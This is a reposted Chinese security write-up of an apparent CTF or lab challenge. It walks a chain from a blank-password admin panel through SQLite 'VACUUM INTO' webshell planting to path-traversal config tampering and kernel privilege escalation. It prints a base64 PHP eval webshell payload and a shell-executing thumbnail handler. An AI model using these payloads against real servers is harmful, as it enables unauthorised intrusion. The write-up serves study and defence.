文章总结: 该文档分析了一个安全漏洞利用链:通过空密码直接进入后台管理系统,利用SQL语句执行功能实现SQLite数据库操作并落地Webshell,最终结合内核CVE-2026-31431漏洞提升至root权限。文章详细展示了Docker环境配置、代码审计过程、密码验证绕过手法及SQL注入点利用方法,提供了完整的渗透测试路径和漏洞复现技术细节。 综合评分: 88 文章分类: 漏洞分析,渗透测试,WEB安全,红队,内网渗透
空密码后台 → SQLite 落地 Webshell → 内核 CVE-2026-31431 root
原创
YMsora YMsora
YMs0ra的安全漫路
2026年5月12日 21:53 浙江
在小说阅读器读本章
去阅读
看看主站是什么
Your site is working normally! Access data at /data, or new site at /new
没发现端倪,附件只给了个docker,去看看
RUN cd /var/www/html && \ rm -rf ./* && \ git clone --depth=1 https://github.com/mnihyc/dlsite.git . && \ touch index.html && \ sed -i '9 i Your site is working normally! Access data at <a href="/data/">/data</a>, or new site at <a href="/new/#/_/test">/new</a>' dl/index.html && \ ln -s /app/data/local/test dl/data && \ sqlite3 db.sqlite "CREATE TABLE CONFIG(NAME NTEXT NOT NULL,TYPE NTEXT NOT NULL,VALUE NTEXT NOT NULL,PRIMARY KEY (NAME,TYPE));" && \ chown -R root:www-data . && \ find . -type d -exec chmod 1775 {} + && \ find . -type f -exec chmod 0664 {} +
这里看到后端是
并且继续往下,
RUN cat > /etc/apache2/sites-available/000-default.conf <<'EOF'<VirtualHost *:80> ServerAdmin webmaster@localhost DocumentRoot /var/www/html
RewriteEngine On RewriteCond %{REQUEST_URI} !^/(main\.php|assets/|favicon\.ico$|robots\.txt$|new(?:/|$)|ancient(?:/|$)) RewriteRule ^ /main.php [L]
<Directory /var/www/html> Options FollowSymLinks AllowOverride None Require all granted </Directory>
<FilesMatch \.phpRUN cat > /etc/apache2/sites-available/000-default.conf <<'EOF'<VirtualHost *:80> ServerAdmin webmaster@localhost DocumentRoot /var/www/html RewriteEngine On RewriteCond %{REQUEST_URI} !^/(main\.php|assets/|favicon\.ico$|robots\.txt$|new(?:/|$)|ancient(?:/|$)) RewriteRule ^ /main.php [L] <Directory /var/www/html> Options FollowSymLinks AllowOverride None Require all granted </Directory> <FilesMatch \.php$> SetHandler "proxy:unix:/run/php/php-fpm.sock|fcgi://localhost" </FilesMatch> <Directory /app/data/local/test> Options FollowSymLinks AllowOverride None Require all granted </Directory> ProxyPreserveHost On <LocationMatch "^/ancient$"> SetHandler "proxy:unix:/run/apache2/ancient.sock|fcgi://localhost" ProxyFCGIBackendType GENERIC ProxyFCGISetEnvIf "true" SCRIPT_FILENAME "/app/data/local/test/index.cgi" ProxyFCGISetEnvIf "true" SCRIPT_NAME "/ancient" </LocationMatch> Alias /ancient/ /app/data/local/test/ ProxyPass /new http://127.0.0.1:8089/new ProxyPassReverse /new http://127.0.0.1:8089/new ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined</VirtualHost>EOFgt; SetHandler "proxy:unix:/run/php/php-fpm.sock|fcgi://localhost" </FilesMatch>
<Directory /app/data/local/test> Options FollowSymLinks AllowOverride None Require all granted </Directory>
ProxyPreserveHost On <LocationMatch "^/ancient$"> SetHandler "proxy:unix:/run/apache2/ancient.sock|fcgi://localhost" ProxyFCGIBackendType GENERIC ProxyFCGISetEnvIf "true" SCRIPT_FILENAME "/app/data/local/test/index.cgi" ProxyFCGISetEnvIf "true" SCRIPT_NAME "/ancient" </LocationMatch> Alias /ancient/ /app/data/local/test/
ProxyPass /new http://127.0.0.1:8089/new ProxyPassReverse /new http://127.0.0.1:8089/new
ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined</VirtualHost>EOF
ache将main.php后跟着的现存目录都重定向回去,.php走socket直接给php-fpm
接下来就是审计后端
if(!OLDSTYLE_PATH || SUPPORT_NEWPATH) { $ismanage=($opath=='/manage'); if($opath=='/view' || $opath=='/down' || $opath=='/manage') { $ropath=''; if(substr($inpasswd,0,2)=='p=') { $ropath=substr($inpasswd,2); if($ismanage) $inpasswd='manage'; else $inpassver=isset($_POST['pass']); if(($vpos=strpos($ropath,'&'))!==FALSE) { $inpasswd=substr($ropath,$vpos+1); $inpassver|=!empty($inpasswd); $ropath=substr($ropath,0,$vpos); } }
如果请求是/mange,覆盖$inpasswd=’manage’;
然后截取的就是密码字段,接着就是
if($inpasswd==='manage') { ob_start(); htmlmsg(); if(checkmanagepassword()) { /* Insert a record */ if(isset($_POST['qi'])) { global $db; $db->execwf("INSERT INTO CONFIG (NAME,TYPE,VALUE) VALUES ('{$db->escapeString($_POST['namei'])}','{$db->escapeString($_POST['typei'])}','{$db->escapeString($_POST['valuei'])}')"); } /* Delete a record */ if(isset($_POST['qd'])) { global $db; $db->execwf("DELETE FROM CONFIG WHERE NAME='{$db->escapeString($_POST['named'])}' AND TYPE='{$db->escapeString($_POST['typed'])}'"); } /* Update a record */ if(isset($_POST['qu'])) { global $db; $db->execwf("UPDATE CONFIG SET VALUE='{$db->escapeString($_POST['valueu'])}' WHERE NAME='{$db->escapeString($_POST['nameu'])}' AND TYPE='{$db->escapeString($_POST['typeu'])}'"); }
if(is_dir(__DIR__.FILE_DIR.$opath) && substr($opath,-1,1)!=='/') $opath.='/'; $qsql="SELECT NAME,TYPE,VALUE FROM CONFIG WHERE NAME LIKE '{$db->escapeString($opath)}%'"; if(isset($_POST['sql']) && !empty($_POST['sql'])) $qsql=$_POST['sql']; $qnamei=$opath; if(isset($_POST['qi']) && isset($_POST['namei']) && !empty($_POST['namei'])) $qnamei=$_POST['namei']; global $db; $res=$db->queryarr($qsql);
发现在checkpassword的时候
function checkmanagepassword() {?><div class="table-responsive"> <table class="table table-striped table-sm"> <thead> <tr> <th class="d-table-cell"> <div class="container"> <p class="lead text-center">A <strong>password</strong> verification is required to access this page. <br></p><?php $passvld=true; if(isset($_POST['manage'])) { $_SESSION['manage']=gethashedpass($_POST['manage']); $_SESSION['expired']=time(); }
if(!isset($_SESSION['expired'])) $passvld=false; else if(abs(time()-$_SESSION['expired'])>=3600*24) { $passvld=false; echo '<p class="lead text-center">Verification <span style="color: red;"><strong>expired</strong></span>.</p>'; } else { if($_SESSION['manage']===MANAGE_PASSWORD) { $passvld=true; echo '<p class="lead text-center">Verification <span style="color: green;"><strong>passed</strong></span>.</p>';
} else { $passvld=false; echo '<p class="lead text-center">Verification <span style="color: red;"><strong>failed</strong></span>.</p>'; } } if(!$passvld) {?>
直接
if($_SESSION['manage']===MANAGE_PASSWORD) { $passvld=true;
就可以返回true
而这个默认的密码是空密码
/* Encrypted password of the management page (keep it SECRET) */ /* The way to compute: md5(md5(PSWD).'+'.sha1(PSWD)) */ /* Default value 7f6d747029adeefe073804e34b089020 means blank password */ define('MANAGE_PASSWORD','7f6d747029adeefe073804e34b089020');
在直接传入/mange?p=,密码字段滞空,就会让check直接返回true,进入后台,审计下后台可做操作
这里
if(is_dir(__DIR__.FILE_DIR.$opath) && substr($opath,-1,1)!=='/') $opath.='/'; $qsql="SELECT NAME,TYPE,VALUE FROM CONFIG WHERE NAME LIKE '{$db->escapeString($opath)}%'"; if(isset($_POST['sql']) && !empty($_POST['sql'])) $qsql=$_POST['sql']; $qnamei=$opath; if(isset($_POST['qi']) && isset($_POST['namei']) && !empty($_POST['namei'])) $qnamei=$_POST['namei']; global $db; $res=$db->queryarr($qsql);
$qsql可以直接进行sql语句执行
这样,我们可以执行sql语句,那么怎么落地文件呢,这里要回到sqlite本身的语法
在上面已经看到过config的示例表了,直接可以插入字段,一共三个字段
在第一段插入php代码,但是如何落地
VACUUM INTO filename;语法
是可以将现在的数据库文件直接复制一份到指定目录的
虽然大部分都是二进制,但是我们其中的php代码不会被转义
我们将这个文件命名后缀为php然后
INSERT OR REPLACE INTO CONFIG (NAME, TYPE, VALUE)VALUES ( 'sora_payload', 'php', '<?php file_put_contents("/var/www/html/dl/ws.php",base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWyJjIl0pOz8+"));?>');
这样就可以将base64编码后的webshell直接插入可访问的目录
达成基础的php rce,但是如何上升系统,因为php端有很多限制
open_basedir = /var/www/html:/tmp:/app/data/local/testdisable_functions = system, exec, shell_exec, passthru, proc_open, popen, copy, rename, unlink, symlink, ...
可以看看docker配置的第二部分
被app直接拉起来,并且
[program:go-drive]command=/usr/local/bin/no_priv /usr/local/bin/go-drive-bootstrap.shdirectory=/appuser=apppriority=30autostart=trueautorestart=truestartsecs=0stdout_logfile=/dev/fd/1stdout_logfile_maxbytes=0stderr_logfile=/dev/fd/2stderr_logfile_maxbytes=0
并且autorestart=true,这里可以看看重启的用户和这个框架重启的逻辑
localRoot, _ := driveUtils.Config.GetLocalFsDir()path, _ = filepath.Abs(filepath.Join(localRoot, path))if exists, _ := utils.FileExists(path); !exists { return nil, notFound}return &Drive{path}, nil
这里并没有检查filepath是否有路径穿越,而这又不是php配置的内容,所以可以绕开php.ini的封锁
新建 fs drive 时填:
../../../../app
filepath.Join(“/app/data/local”, “../../../../app”)
最后会变成:
/app
所以我们可以通过new去挂载服务器的目录到后台,有点像访问指向
所以把管理略缩图的config挂载之后下载之后改
thumbnail: handlers: - type: shell tags: file-types: cmd config: shell: sh /tmp/cmd.sh mime-type: text/plain write-content: false max-size: -1 timeout: 30s
shell指的是这个类型用shell处理
也就是:生成缩略图时,可以执行外部命令。
并且定义后缀为cmd,也就是说当cmd后缀时
调用sh /tmp/cmd.sh,并且返回text
因为 PHP 的 open_basedir 允许 /tmp,所以可以用 ws.php 写:
file_put_contents("/tmp/cmd.sh", "id\nwhoami\nuname -a\n");file_put_contents("/tmp/probe.cmd", "");
于是也就拿到了系统命令的RCE,但是依旧是要提权的
当然在这之前,配置项的文件虽然改变了,但是实际上内存还是没有变化的,
依旧需要重启这个服务,这里就要提到让这个go的程序崩溃的方法了
一个方法就是调用动态脚本处理文件,
再非预期去返回flase,
func (d *ScriptDrive) Save(...) error { result := runJS(...) return result}
这里的result如果是none在后面做path的时候就会
panic: runtime error: invalid memory address or nil pointer dereference
提权阶段,
依旧是看看suid,以及其他的服务有没有
但是这里的服务是通过no_prive起的,并且
struct sock_fprog prog = { sizeof(filter) / sizeof(filter[0]), filter }; if (argc < 2) return 127; if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)) return 126; if (prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog)) return 126; execvp(argv[1], argv + 1); return 127;}
这里PR_SET_NO_NEW_PRIVS指的是不让它起的新程序获得新的权限
所以当前是没法进行直接su的
我尝试了最近的核弹检测POC, CVE-2026-31431
ta的内核并未打补丁,成功提权
当然。此类CVE解析很多,就不赘述了
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:YMs0ra的安全漫路 YMsora YMsora《空密码后台 → SQLite 落地 Webshell → 内核 CVE-2026-31431 root》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论